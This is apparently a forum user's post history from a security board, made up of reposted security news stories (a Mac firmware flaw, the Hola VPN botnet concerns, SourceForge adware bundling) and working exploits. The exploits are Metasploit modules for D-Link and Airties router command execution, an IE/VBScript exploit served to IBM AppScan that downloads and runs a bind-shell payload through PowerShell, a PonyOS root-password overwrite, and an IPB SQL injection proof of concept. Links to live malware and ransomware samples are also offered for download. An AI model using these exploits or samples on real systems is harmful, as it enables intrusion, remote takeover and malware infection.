-
Posts
3453 -
Joined
-
Last visited
-
Days Won
22
Everything posted by Aerosol
-
Hack allows firmware to be rewritten right after older Macs awake from sleep. acs older than a year are vulnerable to exploits that remotely overwrite the firmware that boots up the machine, a feat that allows attackers to control vulnerable devices from the very first instruction. The attack, according to a blog post published Friday by well-known OS X security researcher Pedro Vilaca, affects Macs shipped prior to the middle of 2014 that are allowed to go into sleep mode. He found a way to reflash a Mac's BIOS using functionality contained in userland, which is the part of an operating system where installed applications and drivers are executed. By exploiting vulnerabilities such as those regularly found in Safari and other Web browsers, attackers can install malicious firmware that survives hard drive reformatting and reinstallation of the operating system. The attack is more serious than the Thunderstrike proof-of-concept exploit that came to light late last year. While both exploits give attackers the same persistent and low-level control of a Mac, the new attack doesn't require even brief physical access as Thunderstrike did. That means attackers half-way around the world may remotely exploit it. "BIOS should not be updated from userland and they have certain protections that try to mitigate against this," Vilaca wrote in an e-mail to Ars. "If BIOS are writable from userland then a rootkit can be installed into the BIOS. BIOS rootkits are more powerful than normal rootkits because they work at a lower level and can survive any machine reinstall and also BIOS updates." You will go into a deep sleep Vilaca's exploit works by attacking the BIOS protections immediately after a Mac restarts from sleep mode. Normally, the protection—known as FLOCKDN—allows userland apps read-only access to the BIOS region. For reasons that aren't clear to the researcher, that FLOCKDN protection is deactivated after a Mac wakes from sleep mode. That leaves the firmware open to apps that rewrite the BIOS, a process typically known as reflashing. From there, attackers can modify the machine's extensible firmware interface (EFI), the firmware responsible for starting a Mac's system management mode and enabling other low-level functions before loading the OS. "The flash is unlocked and now you can use flashrom to update its contents from userland, including EFI binaries," Friday's blog post stated, referring to the freely available utility for reading, writing, erasing, and verifying firmware contained in flash chips. "It means Thunderstrike like rootkit strictly from userland." To work, an exploit would require a vulnerability that provides the attacker with unfettered "root" access to OS X resources. Such vulnerabilities aren't always easy to find, but they're by no means impossible, as demonstrated by the Rootpipe privilege escalation bug that came to light late last year. Vilaca said a drive-by exploit planted on a hacked or malicious website could be used to trigger the BIOS attack. "The bug can be used with a Safari or other remote vector to install an EFI rootkit without physical access," Vilaca wrote. "The only requirement is that a suspended happened [sic] in the current session. I haven’t researched but you could probably force the suspend and trigger this, all remotely. That’s pretty epic ownage ;-)." An attacker could add code that deliberately sends a targeted Mac into sleep, or the exploit could be programmed to detonate the BIOS payload the next time a machine comes out of sleep mode. In either case, once the Mac awakes it would be possible for the attacker to bypass OS X firmware protections and rewrite the BIOS. "An exploit could either verify if the computer already went previously into sleep mode and it's exploitable, it could wait until the computer goes to sleep, or it can force the sleep itself and wait for user intervention to resume the session," Vilaca told Ars. "I'm not sure most users would suspect anything fishy is going on if their computer just goes to sleep. That is the default setting anyway on OS X." As was the case with Thunderstrike, Vilaca said he doesn't think his attack is likely to be exploited on a mass scale. Instead, it would likely be exploited only in highly targeted attacks, say those carried out against high-value targets the attackers know and have a high interest in. Vilaca said he has confirmed his attack works against a MacBook Pro Retina, a MacBook Pro 8.2 and a MacBook Air, all of which ran the latest available EFI firmware from Apple. He said Macs released since mid to late 2014 appear to be immune to the attacks. He said he wasn't sure if Apple silently patched the vulnerability on newer machines or if it was fixed accidentally. Ars has asked Apple for comment, but company officials generally don't discuss security issues until a fix has been released. At the moment, Vilaca said, there isn't much users of vulnerable machines can do to prevent exploits other than to change default OS X settings that put machines to sleep when not in use. More advanced users can download software made available by Trammell Hudson, creator of the Thunderstrike exploit. Available here and here, Hudson's software dumps the contents of a Mac's BIOS chip so users can compare the results against firmware files provided by Apple. This safeguard doesn't prevent users from having their Mac firmware rewritten, but it will alert them if such an attack has occurred. "I asked Apple to start publishing these files and their signatures so we can have a good baseline to compare against," Vilaca wrote in his blog post. "Hopefully they will do this one day. I built some tools for this purpose but they aren't public." While the attack isn't likely to be exploited on a mass scale, it's also not hard for people with above-average skill to carry it out. The technique joins a growing roster of attacks that rewrite firmware with a malicious replacement. Besides Thunderstrike, such exploits include BadUSB and attacks against VoIP phones, home and small office routers, and hacks tied to the National Security Agency that hid inside the firmware of hard disk drives. Given the inability of most current security products to detect malicious firmware, such attacks could one day represent a significant threat unless manufacturers devise ways to ensure the authenticity of the firmware powering the devices they sell. "We need to think different and start a trust chain from hardware to software," Vilaca wrote. "Everyone is trying to solve problems starting from software when the hardware is built on top of weak foundations. Apple has a great opportunity here because they control their full supply chain and their own designs. I hope they finally see the light and take over this great opportunity." Headline updated to remove the word "remote" since the hack involves use of a local exploit. Source
-
Virtual private network Hola has downplayed concerns that its 47 million users could become part of a botnet. A botnet is a network of hijacked computers that can be used for criminal activity without the knowledge of their owners. Hola says it has always been open about sending other data via users' devices when they are not in use. However, in a blog post chief executive Ofer Vilenski acknowledged the firm had "made some mistakes". The Israeli company offers a free service but on the condition it can use customers' bandwidth "securely". Mr Vilenski said he had wrongly assumed that describing the network as "peer-to-peer" had made that clear. It also operates a commercial network called Luminati, which can be used to "route data through any of our millions of IPs [computer addresses] that are located in every city around the world", according to its website. The website goes on to say the Luminati network consists of "personal PCs, laptops and mobile devices of participating users". They are the private devices of Hola users, it has been claimed. "The concern with Hola is that it appears to operate like a botnet, and one that is potentially insecure at that," said cybersecurity expert Prof Alan Woodward, from Surrey University. "There is mounting anecdotal evidence that the network is being used as a real botnet. "I haven't seen that in practice but the way in which the service can use your machine appears to have the potential to do something like that." People often use virtual private networks to access internet content that is unavailable in their home country - such as video streaming services Netflix and the BBC iPlayer - but most VPNs are not free. Ofer Vilenski said in his blog post that Hola generated revenue by offering the VPN for "legitimate commercial purposes" only. "We have a record of the real identification and traffic of the Luminati users, such that if a crime is committed, we can report this to the authorities, and thus the criminal is immediately identified," he wrote. Last week, the founder of message board 8Chan said the site had suffered a distributed denial of service (DDOS) attack - when a website is overwhelmed by false requests from computers - that could be traced back to the Luminati network. Mr Vilenski accepted that a spammer had "passed through our filters" to use the service but added that the account had been terminated and "necessary measures" put in place. He said that the firm would shortly begin a "bug bounty programme" offering rewards for people who identified security weaknesses in Hola and Luminati products. Prior to the blog post hundreds of people had already posted on community site Reddit, calling for users to uninstall the network over fears that their devices could unintentionally be used for criminal activity, and Android users have been leaving warning messages in the review section of the app on Google's Play Store. In the FAQ section on its website, updated on 29 May, Hola explains how its "peer-to-peer" model works. "When your device is not in use, other packets of information from other people may be routed through your device," it says. "Hola does this securely, not allowing any access to any of your information. Your device is used only as a router." It also says that users of its premium service, for a monthly fee of $4.99 (£2.28), are not part of the network. Source
-
The takeover of the SourceForge account for the Windows version of the open-source GIMP image editing tool reported by Ars last week is hardly the first case of the once-pioneering software repository attempting to cash in on open-source projects that have gone inactive or have actually attempted to shut down their SourceForge accounts. Over the past few years, SourceForge (launched by VA Linux Systems in 1999 and now owned by the tech job site company previously known as Dice) has made it a business practice to turn abandoned or inactive projects into platforms for distribution of "bundle-ware" installers. Despite promises to avoid deceptive advertisements that trick site visitors into downloading unwanted software and malware onto their computers, these malicious ads are legion on projects that have been taken over by SourceForge's anonymous editorial staff. SourceForge's search engine ranking for these projects often makes the site the first link provided to people seeking downloads for code on Google and Bing search results. And because of SourceForge's policies, it's nearly impossible for open-source projects to get their code removed from the site. SourceForge is, in essence, the Hotel California of code repositories: you can check your project out any time you want, but you can never leave. Finders, keepers As Ars reported, SourceForge posted a statement on the service's blog last week contending that GIMP had abandoned their project, and the site's team had merely picked up the account to maintain it under their "mirror" program for open source and free software projects. But the company did admit that it wrapped the GIMP installer on its site with a Web installer offering commercial software packages to get revenue out of the downloads. For some developers who post code to SourceForge, the adware offering bundles around downloads are welcome. In 2013, the FileZilla project's lead developer Tim Kosse authorized SourceForge to put an offer-producing installer around the project's download file. When someone expressed concern about the adware installer in the FileZilla forum, Kosse replied, "This is intentional. The installer does not install any spyware and clearly offers you a choice whether to install the offered software." He added that an unbundled installer was still available on FileZilla's official download page. FileZilla was an early participant in DevShare, SourceForge's revenue sharing plan for open-source developers. It was supposed to be opt-in only. By allowing SourceForge to wrap downloads in a Web installer that offered up to three different software bundles, open-source projects could generate some cash to support development. But GIMP never enrolled in DevShare—SourceForge foisted the adware on the project's Windows installer after taking over the project's page. On Sunday, the GIMP team issued an official statement through Michael Schumacher, a maintainer of the GIMP website. It said that the GIMP team was never informed of what SourceForge was going to do. "This was done without our knowledge and permission, and we would never have permitted it," Schumacher wrote. Furthermore, he noted, the move broke a promise SourceForge made in November 2013: "We want to reassure you that we will never bundle offers with any project without the developers consent." Schumacher said that "SourceForge are abusing the trust that we and our users had put into their service in the past. We don't believe that this is a fixable situation. Even if they promise to adhere to the set of guidelines outlined below, these promises are likely to become worthless with any upcoming management change at SourceForge. However, if SourceForge's current management are willing to collaborate with us on these matters, then there might be a reduction in the damage and feeling of betrayal among the Free and Open Source Software communities." One way to fix things, Schumacher said, would be for SourceForge to "provide a method for any project to cease hosting at any SourceForge site if desired, including the ability to: completely remove the project and URLs permanently, and not allow any other projects to take its place; remove any hosted files from the service, and not maintain mirrors, serving installers or files differing from those provided by the project or wrap those in any way; [and] provide permanent HTTP redirects (301) to any other location as desired by the project. This is not unreasonable to expect from a service that purports to support the free software community." However, SourceForge's current policy makes pulling a project from the site almost impossible: A little something extra GIMP left SourceForge in part because of what Schumacher called "the invasion of the big green 'Download' button ads." Those ads, which SourceForge promised to make an effort to block from download pages, appear on nearly every one of the downloads for "mirrored" open-source projects either established or taken over by SourceForge's staff. SourceForge isn't alone in hosting these deceptive advertisements that try to fool site visitors into downloading something a little extra. CNET's Downloads.com and other download-focused sites also mirror popular open-source and free software to generate advertising revenue and promote software bundles, and they often include ads with "Download" buttons that are totally unrelated to the software the visitor is seeking. And while many legitimate applications are offered through accompanying downloads on those sites, the ads often deliver software that is of questionable value at best—and malware at worst. But those other sites don't have the same open-source heritage that SourceForge's name carries. Launched in 1999 by the company then known as VA Research (and shortly after as VA Linux Systems), SourceForge was the original open community development platform. The software behind SourceForge became an enterprise product as well. By 2007, even the Department of Defense had embraced it to set up the original Forge.mil at the Defense Information Systems Agency—a way for the military's developers to create military development communities around shared projects, even classified ones. The enterprise version of SourceForge was sold off to CollabNet in April of 2007. And as competition rose from other source code repositories—chiefly from GitHub, which by January of 2013 had more than five million project repositories—many projects began to abandon SourceForge. The service's character seemed to shift after its sale by Geeknet (along with Slashdot and Freecode) to Dice Holdings for $20 million in September 2012, and that company instead focused on the retail site ThinkGeek. (Update: Geeknet is on track to be acquired by GameStop, after Gamestop outbid Hot Topic. This story originally reported the proposed acquisition by Hot Topic from last week.) The GIMP-Windows project is still active on SourceForge, and it is still packaged with the bundle-offer installer. Update: SourceForge now says that it will discontinue this practice for all "abandoned" projects, and only offer the advertisement-loaded installer as an opt-in for active project developers. Source
-
Numele de domenii de internet .ro pot avea diacritice de marţi, 2 iunie
Aerosol replied to em's topic in Stiri securitate
Mneah nu mai stiu pe ce sa ceara banii si asa "te obliga" practic sa cumperi domeniile pentru a evita tentativele de scam(valabil pentru site-urile/companiile mari ) nimic nou... @SynTAX gandim la fel -
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
-
#!/usr/bin/python import BaseHTTPServer, socket ## # IBM Security AppScan Standard OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 # # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7 # # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ # if you able to exploit IE then you can exploit appscan and acunetix # This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And # Metasploit windows/shell_bind_tcp Executable Payload # # Usage: # chmod +x appscan.py # ./appscan.py # ... # nc 172.20.10.14 333 # # Video: http://youtu.be/hPs1zQaBLMU ## class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(req): req.send_response(200) if req.path == "/payload.exe": req.send_header('Content-type', 'application/exe') req.end_headers() exe = open("payload.exe", 'rb') req.wfile.write(exe.read()) exe.close() else: req.send_header('Content-type', 'text/html') req.end_headers() req.wfile.write("""Please scan me! <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\ 'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');" shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0 end function dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script>""") if __name__ == '__main__': sclass = BaseHTTPServer.HTTPServer server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) print "Http server started", socket.gethostbyname(socket.gethostname()), 80 try: server.serve_forever() except KeyboardInterrupt: pass server.server_close() Source
-
# Exploit Title: PonyOS <= 3.0 VFS permissions exploit # Google Dork: [if applicable] # Date: 29th May 2015 # Exploit Author: Hacker Fantastic # Vendor Homepage: www.ponyos.org # Software Link: [download link if available] # Version: 3.0 # Tested on: 3.0 # CVE : N/A # Source: https://github.com/HackerFantastic/Public/blob/master/exploits/rarity.c /* MyLittleUnix <= 3.0 VFS permissions root exploit ================================================ File permissions are not checked, we can abuse this to replace the root user password with our own and escalate our privileges. This exploit now 20% cooler and tested on latest 3.0 mlp OS. -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> char* pwnystr = "root:07821d2459368443042007bf1c7cdf3c55284" "29a65f8f10ce388d301b47865a283147bfd290545b" "0b9b12ae622a8eb359497cb3635506f99d2f5e4c4e" "594cadd:0:0:HackerFantastic:/home/root:/bi" "n/sh:fancy\n"; int main(){ int fd, r; struct stat *fileinfo = malloc(sizeof(struct stat)); char *buffer, *line, *filenm = "/etc/master.passwd"; printf("[+] MyLittleUnix <=3.0 VFS permissions local root exploit\n"); fd = open(filenm,O_RDWR); r = stat(filenm,fileinfo); buffer = malloc((uint)fileinfo->st_size); if(buffer){ read(fd,buffer,fileinfo->st_size); } else{ printf("[!] No pwn for you pwnie\n"); exit(0); } lseek(fd,0,SEEK_SET); line = strtok(buffer,"\n"); while(line){ if(strstr(line,"root:")){ write(fd,pwnystr,strlen(pwnystr)); } else{ write(fd,line,strlen(line)); write(fd,"\n",strlen("\n")); } line = strtok(NULL,"\n"); } close(fd); printf("[-] 20percent COOLER! user 'root' password is 'pwnies'\n"); exit(0); } Source @ManutaDeAur exact ce i-am raspuns si lu byte-ul am sa iti raspund si tie:
-
DONEZ LATIME DE BANDA SI SPATIU STOCARE PENTRU ACEST FORUM
Aerosol replied to ILIE_2015_KILLER's topic in Cosul de gunoi
Salut @Reckon chiar ne era dor de tine. Serios acum nu te saturi niciodata de troll, totusi de ce murdariti forumul cu tot felu de rahaturi... -
Salut si bine ai venit printre noi!
-
Ce nu reusesti mai exact? Eu unul cred ca link-urile de mai sus ( inclusiv PDF-ul ) te pot ajuta destul de mult. Off:// Parerea mea e ca ai facut asta doar pentru a incerca sa subliniezi faptul ca m-am retras si am reinceput activitatea. ( ai bagat "si nu reusesc" ca scuza sa nu fi penalizat pentru offtopic ) lasand toate astea la o parte. Am ales sa revin in urma unei discutii de pe chat si nu cred ca tu sau alt user e in masura sa-mi judece deciziile. Vreau sa subliniez faptul ca: NU SUNT SINGURUL CE A DECIS SA REVINA DUPA CE A ANUNTAT CA SE RETRAGE. ON x2// + ca postez pentru a ajuta "cu materiale" persoanele interesate din domeniu. ( malware ) Poti pune toate intrebarile la care "nu ai un raspuns" si vom incerca toti sa te ajutam cu ce putem!
- 2 replies
-
- embedded
- linux-based
-
(and 3 more)
Tagged with:
-
Dissecting the Linux/Moose malware http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf ( PDF ) Download Source
- 2 replies
-
- embedded
- linux-based
-
(and 3 more)
Tagged with:
-
https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Nivdor-A/detailed-analysis.aspx Infection vector via fake download. https://www.virustotal.com/en/url/3017aa5a0039f5eca181f56f69a29cb178eb621c0884b0380c4284a720ff7e1f/analysis/1432720854/ https://malwr.com/analysis/YzJjMjJiNDRiNWU0NDc2ODg5MzA4ODk0MWFiOGFlOWQ/ ThreatExpert Report https://www.virustotal.com/en/file/2f24ef96a1ed3ca05632f221ff17e8412728bc50b4f7c30a78528f89319b198b/analysis/1432718970/ Download infected Source
-
Meet ‘Tox': Ransomware for the Rest of Us ~ https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us https://www.virustotal.com/en/file/f1384ff19a870f5aa718486666a14e88873d79eaea5725e3a2097b2d9fd9a320/analysis/1432628218/ hxxp://toxicola7qwv37qj.onion/downloads/ransom_50.00_dol_df410f19157f591860e1633b85dfb50b.scr https://malwr.com/analysis/MWExODFmZjM5YjZlNDQ5ODkxYzBkOTk1ZmMzOTcyYzI/ ThreatExpert Report https://blockchain.info/en/address/1KKGLjfDpVtNXymtTkU3PiiCpkJ532cLko Download Pass: infected Source
-
Kaspersky researcher Ido Noar says attackers have hit hundreds of small and medium businesses, stealing credentials and documents in a noisy smash-and-grab campaign. Noar says criminals have stolen some 10,000 documents from nanotechnology, education, and media outfits in an attack that foists a newly-discovered strain of malware called "Grabit". "Our documentation points to a campaign that started somewhere in late February 2015 and ended in mid-March," Noar says in a notice. "As the development phase supposedly ended, malware started spreading from India, the United States and Israel to other countries around the globe. "Grabit threat actors did not use any sophisticated evasions or manoeuvres in their dynamic activity." Attackers did not commit much effort to conceal their command and control servers, nor hide from the local system. Noar discovered the locations of the servers by simply opening the malicious Grabit phishing document file in an editor. "During our research, dynamic analysis showed that the malicious software’s 'call home' functionality communicates over obvious channels and does not go the extra mile to hide its activity. In addition, the files themselves were not programmed to make any kind of registry manoeuvres that would hide them from Windows Explorer," he says. The criminals could choose their favourite remote access trojan including DarkComet and the less complex HawkEye keylogger. Grabit should serve as a wake up call to admins in charge of protecting small businesses that coordinated attack campaigns are not confined to large enterprises and high-profile organisations. Source
-
- businesses
- campaign
-
(and 3 more)
Tagged with:
-
# Exploit Title: Invision Power Board <= 3.4.7 SQL Injection # Date: 29.05.2015 # Exploit Author: ZeroDay # Software Link: http://www.invisionpower.com/ # Version: <= 3.4.7 # Tested on: 3.4.7 # About: For the G-Owl with Love vuln code admin/applications/members/modules_public/list/view.php //----------------------------------------- // Custom fields? //----------------------------------------- if ( count( $this->custom_fields->out_fields ) ) { foreach( $this->custom_fields->out_fields as $id => $data ) { if ( !empty($this->request[ 'field_' . $id ]) ) { $_queryPP = true; if( is_array($this->request[ 'field_' . $id ]) ) { foreach( $this->request[ 'field_' . $id ] as $k => $v ) { $this->request[ 'field_' . $id ][ $k ] = urldecode($v); $url['field_' . $id] = "field_{$id}[{$k}]=" . $v; } } else { $url['field_' . $id] = "field_{$id}=" . $this->request[ 'field_' . $id ]; $this->request[ 'field_' . $id ] = urldecode($this->request[ 'field_' . $id ]); } if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'drop' ) { $query[] = "p.field_{$id}='" . $this->request[ 'field_' . $id ] . "'"; } else if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'cbox' ) { if ( count( $this->request[ 'field_' . $id ] ) ) { if ( $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ) { $cboxFields = array(); foreach ( $this->request[ 'field_' . $id ] as $k => $v ) { $cboxFields[] = "p.field_{$id} LIKE '%|{$k}|%'"; } $query[] = "( " . implode( ' OR ', $cboxFields ) . " )"; } else { foreach ( $this->request[ 'field_' . $id ] as $k => $v ) { $query[] = "p.field_{$id} LIKE '%|{$k}|%'"; } } } } else { $query[] = $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ? "p.field_{$id} LIKE '%" . $this->request[ 'field_' . $id ] . "%'" : "p.field_{$id} = '" . $this->request[ 'field_' . $id ] . "'"; } } } } ...... POC index.php?/members/?field_1=admin%2525%2527%2Bor%2B1%253D1--%2B1 Source
- 1 reply
-
- 1
-
- $id
- $this-request[
-
(and 3 more)
Tagged with:
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Airties login-cgi Buffer Overflow', 'Description' => %q{ This module exploits a remote buffer overflow vulnerability on several Airties routers. The vulnerability exists in the handling of HTTP queries to the login cgi with long redirect parameters. The vulnerability doesn't require authentication. This module has been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation. Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable. }, 'Author' => [ 'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSBE, 'References' => [ ['EDB', '36577'], ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC ], 'Targets' => [ [ 'AirTies_Air5650v3TT_FW_1.0.2.0', { 'Offset' => 359, 'LibcBase' => 0x2aad1000, 'RestoreReg' => 0x0003FE20, # restore s-registers 'System' => 0x0003edff, # address of system-1 'CalcSystem' => 0x000111EC, # calculate the correct address of system 'CallSystem' => 0x00041C10, # call our system 'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call } ] ], 'DisclosureDate' => 'Mar 31 2015', 'DefaultTarget' => 0)) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check begin res = send_request_cgi({ 'uri' => '/cgi-bin/login', 'method' => 'GET' }) if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 100 ) end def prepare_shellcode(cmd) shellcode = rand_text_alpha_upper(target['Offset']) # padding shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values # 0003FE20 lw $ra, 0x48+var_4($sp) # 0003FE24 lw $s7, 0x48+var_8($sp) # 0003FE28 lw $s6, 0x48+var_C($sp) # 0003FE2C lw $s5, 0x48+var_10($sp) # 0003FE30 lw $s4, 0x48+var_14($sp) # 0003FE34 lw $s3, 0x48+var_18($sp) # 0003FE38 lw $s2, 0x48+var_1C($sp) # 0003FE3C lw $s1, 0x48+var_20($sp) # 0003FE40 lw $s0, 0x48+var_24($sp) # 0003FE44 jr $ra # 0003FE48 addiu $sp, 0x48 shellcode << rand_text_alpha_upper(36) # padding shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1 shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4 shellcode << [target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system # 00041C10 move $t9, $s0 # 00041C14 jalr $t9 # 00041C18 nop shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7 shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parameter for call to system # 000215B8 addiu $a0, $sp, 0x20 # 000215BC lw $ra, 0x1C($sp) # 000215C0 jr $ra # 000215C4 addiu $sp, 0x20 shellcode << rand_text_alpha_upper(28) # padding shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address) # 000111EC move $t9, $s5 # 000111F0 jalr $t9 # 000111F4 addiu $s0, 1 shellcode << cmd end def execute_command(cmd, opts) shellcode = prepare_shellcode(cmd) begin res = send_request_cgi({ 'method' => 'POST', 'uri' => '/cgi-bin/login', 'encode_params' => false, 'vars_post' => { 'redirect' => shellcode, 'user' => rand_text_alpha(5), 'password' => rand_text_alpha(8) } }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
-
